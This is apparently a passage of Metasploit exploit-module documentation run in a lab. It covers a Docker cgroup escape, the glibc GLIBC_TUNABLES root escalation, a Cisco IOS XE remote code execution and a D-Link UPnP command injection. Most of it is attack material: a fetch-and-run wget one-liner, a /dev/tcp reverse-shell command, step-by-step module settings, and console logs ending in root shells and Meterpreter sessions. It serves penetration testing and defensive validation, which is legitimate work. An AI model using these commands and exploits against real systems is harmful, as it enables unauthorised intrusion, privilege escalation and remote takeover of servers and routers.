wget -qO dLFtachL --no-check-certificate http://1.1.1.1:8181/QZWpVr8t; chmod +x dLFtachL; ./dLFtachL& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60288) at 2023-11-28 13:38:39 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/) > getuid
Server username: root
(Meterpreter 1)(/) > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 4.15.0-96-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
Exploit the Docker Escape
```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/docker_cgroup_escape
[*] Using configured payload cmd/unix/reverse_bash
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lhost 1.1.1.1
lhost => 1.1.1.1
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lport 9988
lport => 9988
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set verbose true
verbose => true
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > run
[+] bash -c '0<&181-;exec 181<>/dev/tcp/1.1.1.1/9988;sh <&181 >&181 2>&181'
[*] Started reverse TCP handler on 1.1.1.1:9988
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Unable to determine host OS, this check method is unlikely to be accurate if the host isn't Ubuntu
[+] The target is vulnerable. IF host OS is Ubuntu, kernel version 4.15.0-96-generic is vulnerable
[*] Creating folder for mount: /tmp/eH7EY
[*] Creating directory /tmp/eH7EY
[*] /tmp/eH7EY created
[*] Mounting cgroup
[*] Creating folder in cgroup for exploitation: /tmp/eH7EY/qe0oj7G
[*] Creating directory /tmp/eH7EY/qe0oj7G
[*] /tmp/eH7EY/qe0oj7G created
[*] Enabling notify on release for group qe0oj7G
[*] Determining the host OS path for image
[*] Host OS path for image: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff
[*] Setting release_agent path to: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff/tmp/KksBaCbF
[*] Uploading payload to /tmp/KksBaCbF
[*] Writing '/tmp/KksBaCbF' (88 bytes) ...
[*] Triggering payload with command: sh -c "echo $$ > /tmp/eH7EY/qe0oj7G/cgroup.procs"
[*] Command shell session 2 opened (1.1.1.1:9988 -> 2.2.2.2:54990) at 2023-11-28 14:39:10 -0500
[*] Cleanup: Unmounting /tmp/eH7EY
FDjfSpoVnqvGmrtBOSRfABBgFMmcSkbT
id
uid=0(root) gid=0(root) groups=0(root)
cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
```
documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md
+169
View File
@@ -0,0 +1,169 @@
## Vulnerable Application
A buffer overflow was exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment
variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when
launching binaries with SUID permission to execute code in the context of the root user.
This module targets glibc packaged on Ubuntu and Debian. The specific versions this module targets are:
Ubuntu:
2.35-0ubuntu3.4 > 2.35
2.37-0ubuntu2.1 > 2.37
2.38-1ubuntu6 > 2.38
Debian:
2.31-13-deb11u7 > 2.31
2.36-9-deb12u3 > 2.36
Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911
however this module does not target them.
### Description
The GLIBC_TUNABLES environment variable is parsed in a loop and is expected to be provided in the following format:
`tunable1=aaa:tunable2=bbb`. If the variable is sent in the following format: `tunable1=tunable2=AAA` due to the
absence of the tunable delimiter `:` in the string, the value `tunable2=AAA` is handled incorrectly and results in a
buffer overflow.
### Setup
Install [Ubuntu 22.04.3](https://releases.ubuntu.com/jammy/ubuntu-22.04.3-desktop-amd64.iso) while ensuring the VM does
not have internet access.
Once booted up, edit `/etc/apt/apt.conf.d/20auto-upgrades` and change `APT::Periodic::Unattended-Upgrade` from `1` to
`0` to ensure to ensure the machine doesn't patch itself.
Ensure that glibc is at version 2.35-0ubuntu3.1 by running the following:
```
msfuser@msfuser-virtual-machine:~$ ldd --version
ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
```
The target should be exploitable.
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. Do: `use exploit/linux/local/glibc_tunables_priv_esc`
4. Do: `set SESSION [SESSION]`
5. Do: `check`
6. Do: `run`
7. You should get a new *root* session
## Scenarios
### Ubuntu 22.04.3 with 2.35-0ubuntu3.1 installed (ARCH_X64)
```
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set session -1
session => -1
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lport 5555
lport => 5555
msf6 exploit(linux/local/glibc_tunables_priv_esc) > options
Module options (exploit/linux/local/glibc_tunables_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION -1 yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.123.1 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/glibc_tunables_priv_esc) > run
View the full module info with the info, or info -d command.
[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Sending stage (3045380 bytes) to 192.168.123.228
[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.228:33016) at 2023-12-19 10:53:09 -0500
meterpreter >getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.123.228
OS : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### Debian 12 with 2.36-9-deb12u1 installed (ARCH_X64)
```
msf6 exploit(linux/local/glibc_tunables_priv_esc) > options
Module options (exploit/linux/local/glibc_tunables_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION -1 yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.123.1 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lport 5555
lport => 5555
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/glibc_tunables_priv_esc) > run
[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.36-9+deb12u1) found on the target appears to be vulnerable
[+] The Build ID for ld.so: a99db3715218b641780b04323e4ae5953d68a927 is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Sending stage (3045380 bytes) to 192.168.123.229
[*] Meterpreter session 3 opened (192.168.123.1:5555 -> 192.168.123.229:50370) at 2023-12-19 12:21:34 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : debian.test.com
OS : Debian 12.1 (Linux 6.1.0-10-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
+398
View File
@@ -0,0 +1,398 @@
## Vulnerable Application
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
The vulnerable IOS XE versions are:
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
17.11.99SW
## Testing
This module was tested against IOS XE version 16.12.3 and version 17.3.2. To test this module you will need to either:
* Acquire a hardware device running one of the vulnerable firmware versions listed above.
Or
* Setup a virtualized environment.
* A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the
[Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
[topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
* A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
* When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
* Create a new CSR1000v instance as a QEMU device.
* The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
be accessible to a remote attacker.
* When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
the device:
```
Router>enable
Router#config
Router(config)#ip http server
router(config)#ip http secure-server
router(config)#ip http authentication local
router(config)#username admin privilege 15 secret qwerty
router(config)#exit
Router#copy running-config startup-config
```
* You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
## Verification Steps
1. Start msfconsole
2. `use exploit/linux/misc/cisco_ios_xe_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set target 0`
5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
6. `check`
7. `exploit`
## Options
### CISCO_VRF_NAME
We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of
'global' should work, but exposing this as an option will allow for usage in more complex network setups.
A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to
inspect a devices configuration to see an appropriate VRF to use.
### CISCO_CMD_TIMEOUT
We may need to try and execute a command a second time if it fails the first time. This option is the maximum
number of seconds to keep trying.
## Scenarios
To support a broad set of available payloads, we support both a Linux target and a Unix Target (IOS XE is Linux based).
This allows for native Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
### Linux Command (IOS XE 17.3.2)
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOST 192.168.86.58
RHOST => 192.168.86.58
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
[+] 192.168.86.58:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.58 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME dDrTvTlqxwoK no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'
[*] Removing user 'sqVXixoV'
[*] Sending stage (3045380 bytes) to 192.168.86.58
[*] Meterpreter session 6 opened (192.168.86.42:4444 -> 192.168.86.58:64970) at 2023-11-06 17:01:06 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : router
OS : (Linux 4.19.106)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'pfGnCwkI' with password 'YhTwxBLK'
[*] Removing user 'pfGnCwkI'
[*] Sending stage (38 bytes) to 192.168.86.58
[*] Command shell session 7 opened (192.168.86.42:4444 -> 192.168.86.58:64994) at 2023-11-06 17:01:44 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.58 - Command shell session 7 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
```
### Linux Command (IOS XE 16.12.3)
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.59 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME ytfnShmfT no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'lwWQIDaS' with password 'dADCGJpS'
[*] Removing user 'lwWQIDaS'
[*] Sending stage (3045380 bytes) to 192.168.86.59
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.59:56554) at 2023-11-06 16:41:06 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : router
OS : (Linux 4.19.64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'NjAmOioM' with password 'tOHjWGyw'
[*] Removing user 'NjAmOioM'
[*] Sending stage (38 bytes) to 192.168.86.59
[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.59:56598) at 2023-11-06 16:44:48 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.59 - Command shell session 5 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
```
### Unix Target (IOS XE 17.3.2)
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'JAonVuJS' with password 'vYecWhWk'
[*] Removing user 'JAonVuJS'
[*] Sending stage (24772 bytes) to 192.168.86.58
[*] Meterpreter session 8 opened (192.168.86.42:4444 -> 192.168.86.58:65016) at 2023-11-06 17:03:34 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : router
OS : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'TVtEhbdd' with password 'NtRvujcZ'
[*] Removing user 'TVtEhbdd'
[*] Command shell session 9 opened (192.168.86.42:4444 -> 192.168.86.58:65036) at 2023-11-06 17:04:28 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.58 - Command shell session 9 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
```
### Unix Target (IOS XE 16.12.3)
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.59 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Unix Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'pJaWZBTl' with password 'KlcuLPaJ'
[*] Removing user 'pJaWZBTl'
[*] Sending stage (24772 bytes) to 192.168.86.59
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.59:56572) at 2023-11-06 16:42:36 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : router
OS : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'aZIYJugi' with password 'RziZqysr'
[*] Removing user 'aZIYJugi'
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.59:56584) at 2023-11-06 16:43:30 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.59 - Command shell session 4 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
```
documentation/modules/exploit/linux/upnp/dlink_upnp_msearch_exec.md
+267
View File
@@ -0,0 +1,267 @@
## Vulnerable Application
This vulnerability is based on an old theme that was discovered in 2013 by `Zach Cutlip` and explained in
his blog [The Shadow File](https://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html).
It is based on the infamous `UPnP` attack where a command injection vulnerability exists in multiple D-Link network products,
allowing an attacker to inject arbitrary command to the `UPnP` via a crafted M-SEARCH packet.
Universal Plug and Play (UPnP), by default is enabled in most D-Link devices, on the port 1900 and an attacker can perform
a remote command execution by injecting the payload into the `Search Target` (ST) field of the SSDP M-SEARCH discover packet.
## Installation
Ideally, to test this module, you would need a vulnerable D-Link device.
However, by downloading the firmware and install and use `FirmAE` to emulate the router,
we can simulate the router and test the vulnerable endpoint.
This module has been tested on:
- [ ] FirmAE running on Kali Linux 2023.3
* D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older;
* D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older;
* D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older;
* D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older;
* D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older;
* D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older;
* D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older;
* D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older;
* D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older;
* D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older;
* D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older;
* D-Link Router model DIR-845L revisions Ax with firmware v1.02b05 or older;
* D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older;
* D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older;
* D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older;
* D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older;
* D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older;
* D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older;
* D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older;
* D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older;
* D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older;
* D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older;
* D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older;
* D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older;
* probably more looking at the scale of impacted devices :-(
### Installation steps to emulate the router firmware with FirmAE
* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
* To emulate the specific firmware that comes with the D-Link devices, `binwalk` might need to be able to handle a sasquatch filesystem.
* Follow installation and compilation steps that you can find [here](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
* Download the vulnerable firmware from D-Link [here](http://legacyfiles.us.dlink.com/).
* Pick `DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP` for the demonstration.
* Start emulation.
* First run `./init.sh` to initialize and start the Postgress database.
